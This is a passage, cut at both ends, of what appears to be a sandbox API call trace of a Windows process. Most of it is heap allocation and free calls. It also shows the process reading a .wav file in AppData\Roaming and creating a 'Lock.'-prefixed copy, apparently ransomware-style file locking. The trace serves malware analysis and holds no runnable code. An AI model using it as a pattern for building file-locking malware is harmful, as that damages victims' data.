hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0241.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0241.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0241.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0241.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0241.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0241.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0241.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0241.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0241.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0241.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0241.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ZBOT YHAwSRJf tb.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zbot yhawsrjf tb.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0241.549] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.549] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0241.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0241.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0241.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0241.550] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0241.550] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0241.550] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0241.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0241.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0241.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0241.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0241.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0241.551] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0241.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0241.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0241.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0241.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0241.553] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.ZBOT YHAwSRJf tb.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.zbot yhawsrjf tb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0241.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0241.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0241.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0241.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0241.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0241.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0241.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0241.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0241.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5f020 [0241.556] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0241.556] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0241.561] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x472a, lpOverlapped=0x0) returned 1 [0241.561] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0241.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0241.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0241.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0241.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1472a) returned 0x2f14818 [0241.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f020 | out: hHeap=0x970000) returned 1 [0241.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0241.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0241.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0241.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0241.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0241.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1472a) returned 0x2f28f50 [0241.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0241.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.576] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0241.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0241.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1472a) returned 0x2f14818 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.577] HeapFree (in: 